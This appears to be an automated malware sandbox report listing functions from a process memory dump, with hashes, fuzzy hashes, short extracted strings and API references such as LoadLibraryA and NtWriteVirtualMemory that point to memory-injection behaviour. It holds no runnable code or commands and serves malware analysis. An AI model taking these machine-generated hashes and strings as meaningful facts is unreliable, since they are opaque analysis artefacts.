Instruction ID: eedbaba13e644ba4e91e0bbf7fcd41921d7b1b55643d7c332f17865c23e9e68c
Opcode Fuzzy Hash: b3e7a64d2e2280b7d49c8b7f69e67f1be8ab205b489057398aafd6c8851bd922
Instruction Fuzzy Hash: 3052CAB26043899FDB749F39CD457DA7BB2FF99310F42812ADC499B624D3709A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02415ECD, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 617COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 1fc6201d1ae554649d508b1e97996a53362183a8c84bbd056297f6ab7452ef40
Instruction ID: b60272a8c80ea016f393363e01e67f4e69c726bfe6930178d3bae4fbbe3d42a1
Opcode Fuzzy Hash: 1fc6201d1ae554649d508b1e97996a53362183a8c84bbd056297f6ab7452ef40
Instruction Fuzzy Hash: E352CAB26043899FDB749F39CD457DA7BB2FF99310F42812ADC499B624D3709A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02415ED9, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 615COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 5fbf3932fccb89ee1750190fc950c751bf604a0bb85d3c57cfd935d330761e6f
Instruction ID: 7a7e3947fe589221ef2dcbb9eab4749ac611342ddcd073d438058ac544feb7f3
Opcode Fuzzy Hash: 5fbf3932fccb89ee1750190fc950c751bf604a0bb85d3c57cfd935d330761e6f
Instruction Fuzzy Hash: 1542CAB26043899FDB749F39CD457DA7BB2FF99310F42812ADC499B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02415EE5, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 612COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: e6c6251d824ed720dc124bcbb0be8291550ec5d82a0ee8ab338c36f0167ee183
Instruction ID: 9ec175562647af4ad7cedb11da6e6faf52587ce13b9df96bd8720906cea11f76
Opcode Fuzzy Hash: e6c6251d824ed720dc124bcbb0be8291550ec5d82a0ee8ab338c36f0167ee183
Instruction Fuzzy Hash: 2742CAB26043899FDB749F39CD457DA7BB2FF59310F46812ADC899B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416041, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 586COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 11b01c27aa143acc8f822910964fde778c5f13dde6da749ff776b8180d662bc8
Instruction ID: cadf66ae3edbeafe0bb85621600fed437f291e12d3ee12c080f9de96752e7f7a
Opcode Fuzzy Hash: 11b01c27aa143acc8f822910964fde778c5f13dde6da749ff776b8180d662bc8
Instruction Fuzzy Hash: B942BAB26043899FDB749F39CD457DA7BB2FF59310F46812ADC499B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416059, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 581COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: faff0e45f4a82360a1a522b295f69086ca54f269b454cae2f946dd8d7166b86c
Instruction ID: 259623377d0eb244fa679dfa2b00d37e08957835fb5560b1fec432b83e71e406
Opcode Fuzzy Hash: faff0e45f4a82360a1a522b295f69086ca54f269b454cae2f946dd8d7166b86c
Instruction Fuzzy Hash: 5542B9B26043899FDB749F39CD457EABBB2FF59310F45812ADC499B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416065, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 580COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 0d24a35a57ff53d034a4051b10e2ba8ac6b0b02607043605c75405177d3fa218
Instruction ID: 2adaa96e3107411420e48f44660e45f2845ae07f2c7f5a348519f07383a3aeeb
Opcode Fuzzy Hash: 0d24a35a57ff53d034a4051b10e2ba8ac6b0b02607043605c75405177d3fa218
Instruction Fuzzy Hash: E642CAB26043899FDB748F39CD457DABBB2FF59310F46812ADC499B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416029, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 577COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 69800d93dca68507ae0f4d4007650a9f2b29c0dd2f6f1f5675b85417a7d823a6
Instruction ID: fd213b2ef87738d591e7952fee21cd26f8f2842f309686926472d09b70a2fa8e
Opcode Fuzzy Hash: 69800d93dca68507ae0f4d4007650a9f2b29c0dd2f6f1f5675b85417a7d823a6
Instruction Fuzzy Hash: 5142CAB26043899FDB748F39CD457DABBB2FF58310F45812ADC899B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416071, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 575nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 024194E5: LoadLibraryA.KERNELBASE(?,74943F2C,?,0241772D,07B490AF), ref: 02419684

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 02416CBD

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 3569954152-2385936248
Opcode ID: e3ef101fc9a097eead5e66622b92d609c3d3f5c4efdd10a7a87fa95fc0b410c5
Instruction ID: 6ea06812f9817fd7ec872acfd8fecad915d2f1b61c6c40cf6ea3e781874761f7
Opcode Fuzzy Hash: e3ef101fc9a097eead5e66622b92d609c3d3f5c4efdd10a7a87fa95fc0b410c5
Instruction Fuzzy Hash: 5B42CAB26043899FDB749F39CD457DABBB2FF59310F46812ADC499B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416035, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 575COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: ba0e38d64c2a3ec52fe88d72aed9fa085864ebdbf2c6cee8f906cc314e6a1151
Instruction ID: 6546b06346b5ce861403cbcbc0d495c519075838f04bdc1ef30d61bdc511a629
Opcode Fuzzy Hash: ba0e38d64c2a3ec52fe88d72aed9fa085864ebdbf2c6cee8f906cc314e6a1151
Instruction Fuzzy Hash: 0742CAB26043899FDB749F39CD457DABBB2FF59310F45812ADC899B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416155, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 570COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: b2d335ee001cfbed93c5e120fd387ee7877955b546e8799770e998233aa3616e
Instruction ID: 5b5d2c03a9c8ce9a97a1d0e1a674b8ffcab272e11a55c853c852c0ae1d318d52
Opcode Fuzzy Hash: b2d335ee001cfbed93c5e120fd387ee7877955b546e8799770e998233aa3616e
Instruction Fuzzy Hash: C442DAB26043899FDB749F39CD457DA7BB2FF59310F45812ADC899B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02416251, Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 509COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: 2993665c875bb08cb0b2401e5ace3c312c91ff09298cbc40a75eca7c6e4915df
Instruction ID: ececc88fc2470de6ccb7587e5188f7d45af2e01f7ae4d85e6c640c5c6f9e60ed
Opcode Fuzzy Hash: 2993665c875bb08cb0b2401e5ace3c312c91ff09298cbc40a75eca7c6e4915df
Instruction Fuzzy Hash: 5022D9B26043899FDB748F39CD457DA7BB2FF99310F45812ADC499B624D3709A82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02416281, Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 502COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: 6e790ff7ec5c73e056331811f508d5efd60b7bbb5f5438db906cb75178d87bd9
Instruction ID: cc18b8f3f3651a0baeddf0e3a8eb46a8de8c33dafab08c10bd01e7d3b1cedb4d
Opcode Fuzzy Hash: 6e790ff7ec5c73e056331811f508d5efd60b7bbb5f5438db906cb75178d87bd9
Instruction Fuzzy Hash: 4D22D9B26043899FDB748F39CD457DABBB2FF59310F45812ADC499B624D3709A82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0241628D, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 497COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: cdd8e1a1e1031d7369f3b7e4972943c99c5ec0bd9c1f3a57c9664ea9815b61b7
Instruction ID: f1c5df672950ec964d1bea727e004a750f56d38af407d95f9d066e076d61f85c
Opcode Fuzzy Hash: cdd8e1a1e1031d7369f3b7e4972943c99c5ec0bd9c1f3a57c9664ea9815b61b7
Instruction Fuzzy Hash: FB22C8B26043899FDB748F29CD457DABBB2FF58310F45812ADC499B624D3749A82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0241625D, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: 91338f736a0eb9c053922fb59502fc30a7e5e0a920d341497737f052283d4c23
Instruction ID: 013898f328357b863ba534e69a32e3ff284a0cd713d5cf579a7ce524ba54d155
Opcode Fuzzy Hash: 91338f736a0eb9c053922fb59502fc30a7e5e0a920d341497737f052283d4c23
Instruction Fuzzy Hash: BE22C9B26043899FDB748F29CD457DA7BB2FF58310F45812ADC499B624D3709A82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02416269, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 492COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$$M$KV$`1$d-
API String ID: 0-591059297
Opcode ID: 2bb326867a9f2ed62b39cd11ee7f8341f7c7ac64117011b978e29031dd1f9e72
Instruction ID: 04080e66f58abc930813419e98e7c5c41e60451be7d26ede5f59551809608c13
Opcode Fuzzy Hash: 2bb326867a9f2ed62b39cd11ee7f8341f7c7ac64117011b978e29031dd1f9e72
Instruction Fuzzy Hash: AE22C9B26043899FDB748F39CD457DA7BB2FF59310F45812ADC499B624D3709A82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0241635B, Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 453COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
`1, xrefs: 0241633D
KV, xrefs: 02416577
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$$M$KV$`1$d-
API String ID: 0-3096506169
Opcode ID: 32b497d301493d6977712f2b5168d4c3f125304af125b2072ea3b5920901467f
Instruction ID: 006558d515d843d1c89e03ebbf762ac872248a87d968ba1033b97f1d956d5bd1
Opcode Fuzzy Hash: 32b497d301493d6977712f2b5168d4c3f125304af125b2072ea3b5920901467f
Instruction Fuzzy Hash: 0C12C7B2604289DFDB748F39CD457DA7BB2FF98310F55812ADC499B624D3709A82CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0241646D, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 425COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
KV, xrefs: 02416577

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 81d34cee5de100c75a6c20dd1f1d5c9d471f5fd7afb55b6daa92994f490b688b
Instruction ID: 0dc368d024ee31ad7504827eedd3c589c8dbda79a484e06288a9351bd9dec822
Opcode Fuzzy Hash: 81d34cee5de100c75a6c20dd1f1d5c9d471f5fd7afb55b6daa92994f490b688b
Instruction Fuzzy Hash: 4E02FCB2604298DFDF758F78CD457DA3BA2FF99310F45812ADC4D9B214D3709A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416491, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
KV, xrefs: 02416577

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 0d068a6a4c5a71f8c60b519dc45cd833d92da069be17db2156b7f6c2ee892d05
Instruction ID: 76b49db258790ad6d10fb981074bc1526c2bbf5c9d5172b677c033dee67c83f6
Opcode Fuzzy Hash: 0d068a6a4c5a71f8c60b519dc45cd833d92da069be17db2156b7f6c2ee892d05
Instruction Fuzzy Hash: CB02FCB6604288DFDF758F78CD457EA3BA2FF99310F46812ADC4D9B214D3709A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 0241649D, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 418COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
KV, xrefs: 02416577

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: cf578b69ac11dfdc99723c76aa3b02a7f6bce930c3154af4d7641f456717f1a1
Instruction ID: d7a912cccc18d162a7cd3b64f459b4e527df33881fb9cfc81c6ca0430260e720
Opcode Fuzzy Hash: cf578b69ac11dfdc99723c76aa3b02a7f6bce930c3154af4d7641f456717f1a1
Instruction Fuzzy Hash: 6402FCB2604288DFDF758F68CD457EA3BB2FF99310F45812ADC4D9B214D3709A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416479, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 407COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
KV, xrefs: 02416577

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 3224bfd42e4addc6a7051ea82a5c92f6e5c419fdbefd77d57f9b514e1003a9ae
Instruction ID: 4301bc63b765aa6825ae96f4153df3bce32ece02d110f6929e066bdfff46fadb
Opcode Fuzzy Hash: 3224bfd42e4addc6a7051ea82a5c92f6e5c419fdbefd77d57f9b514e1003a9ae
Instruction Fuzzy Hash: 8702EBB2604288DFDF758F79CD457DA3BA2FF98310F41812ADC4D9B224D3709A868B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416485, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 406COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
KV, xrefs: 02416577

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: b3c51446cc2cc6315759d5daf7f939defb1bf0b00893168ba2128b4b23df11f7
Instruction ID: 4de0c64be3d47166b3a0cb3d97d535cabdc7a2777929b1054f0c21096020a5e2
Opcode Fuzzy Hash: b3c51446cc2cc6315759d5daf7f939defb1bf0b00893168ba2128b4b23df11f7
Instruction Fuzzy Hash: 0702ECB2604288DFDF758F38CD457DA3BA2FF98310F42812ADC4D9B224D3709A868B41

Uniqueness

Uniqueness Score: -1.00%

Function 024164A9, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
KV, xrefs: 02416577

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$KV$d-
API String ID: 0-317857802
Opcode ID: 40f070a54270ba6362602e2b69b1d8c456ec6bb8e0ca55720d364bd2b217d868
Instruction ID: 56ec42b433085d9a49da23c470aae30edeaac7ee5a554efd3c7334e7267cfb1e
Opcode Fuzzy Hash: 40f070a54270ba6362602e2b69b1d8c456ec6bb8e0ca55720d364bd2b217d868
Instruction Fuzzy Hash: CC02DAB2604288DFDF758F69CD457DA3BA2FF99310F41812ADC4D9B224D7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416745, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 592000fc31745fe3218a7c14104c1ec295afe8c88f6a6d4b282655b045b81d44
Instruction ID: 9c7d8fe3e81dfdd51d38f185ef5a9b2dc4b1714632b1c3648114a48c10c77715
Opcode Fuzzy Hash: 592000fc31745fe3218a7c14104c1ec295afe8c88f6a6d4b282655b045b81d44
Instruction Fuzzy Hash: A1D1C7B2604298DFDF758F38CC457DA3BA6FF59310F46812ADC4D9B264C7719A828B81

Uniqueness

Uniqueness Score: -1.00%

Function 02416751, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: b6ce8e10ea538518bad2cefb6e37ede966a27df42b98660a6283370f06e79591
Instruction ID: 8aac88bcad7960137c45d438f5f34995dc58ed2eef714a6fad0bca1ffc9a907d
Opcode Fuzzy Hash: b6ce8e10ea538518bad2cefb6e37ede966a27df42b98660a6283370f06e79591
Instruction Fuzzy Hash: C8D1D8B2600298DFDF758F28CC457DA3BB6FF58310F46812ADC4D9B224C7719A828B81

Uniqueness

Uniqueness Score: -1.00%

Function 0241675D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 288COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: d6ae10dc09713de413c4be9418f53c367d904e5edf30976fb679d8ca93d8df8d
Instruction ID: ae93ce7b3961aa1b6c02395043addc558e724f464c306a0c063f8682ff697cc1
Opcode Fuzzy Hash: d6ae10dc09713de413c4be9418f53c367d904e5edf30976fb679d8ca93d8df8d
Instruction Fuzzy Hash: 46D1D7B2600298DFDF758F28CC457DA3BB6FF58310F46812ADD4D9B264C7719A828B81

Uniqueness

Uniqueness Score: -1.00%

Function 02416829, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 273COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 8245c8c85c46a16dfc259653d0dcf4ebec9102e3a6b9b54b144e2a802c7232c7
Instruction ID: 29fe9fa0c78d7e8e62e9a5acc5f9a29cb2c1130d16e556039913c79471c6459a
Opcode Fuzzy Hash: 8245c8c85c46a16dfc259653d0dcf4ebec9102e3a6b9b54b144e2a802c7232c7
Instruction Fuzzy Hash: 3EC1E9B2600398DFDF758F28CC45BDA3BB6FF59310F46812ADD499B260C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416835, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 270COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 7ee15760cf4b8b6c859af356510317e66fc76753f7d588bd19215ce14d2a406f
Instruction ID: cf498c663a7ddf71c2bd047610c7510e24c461249ad14b48f041d09ecd5d4c0d
Opcode Fuzzy Hash: 7ee15760cf4b8b6c859af356510317e66fc76753f7d588bd19215ce14d2a406f
Instruction Fuzzy Hash: DCC1D8B2600398DFDF758F28CC857DA3BB6FF59310F46812ADD499B260C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416841, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 268COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: ccb6beb90bfd5bf6de09271b09b458ae8f018c25dd1b1a8c33e890af75f88505
Instruction ID: 4b068a2f94c21e3be7b5a76cddae490fd85e47be15e95d528f76f7f3876dea92
Opcode Fuzzy Hash: ccb6beb90bfd5bf6de09271b09b458ae8f018c25dd1b1a8c33e890af75f88505
Instruction Fuzzy Hash: DEC1D7B2600398DFDF758F28CC857DA3BB6FF59310F46812ADD499B264C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 02416805, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 264COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 50e535767edf5607c9c254674256f558b6d239ff0a575f5a425584755bdae801
Instruction ID: 0dfd98b41e50ec4677c6beef13bb003b223322ba2d7ad38ee646aa7527fcf87b
Opcode Fuzzy Hash: 50e535767edf5607c9c254674256f558b6d239ff0a575f5a425584755bdae801
Instruction Fuzzy Hash: E5C1C7B2500398DFDF758F28CC85BDA3BB6FF59310F46812ADD499B264C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 0241681D, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: $M$d-
API String ID: 0-3139223441
Opcode ID: 4a1d511e3094e386e5715ab8edd5643e6bde71ac5a75b96e72de2d4c41589e27
Instruction ID: 960ddd108682aa43e866c6b44e22ef1c9b3f0b90b50b7ac40fe3749fb75bc68c
Opcode Fuzzy Hash: 4a1d511e3094e386e5715ab8edd5643e6bde71ac5a75b96e72de2d4c41589e27
Instruction Fuzzy Hash: 21C1C872500398DFDF758F28CC86BDA3BB6FF58314F45812ADD499B264C7719A828B41

Uniqueness

Uniqueness Score: -1.00%

Function 0241684C, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 252nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,A9312851,?,00000000,?), ref: 02416CBD

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: $M$d-
API String ID: 3527976591-3139223441
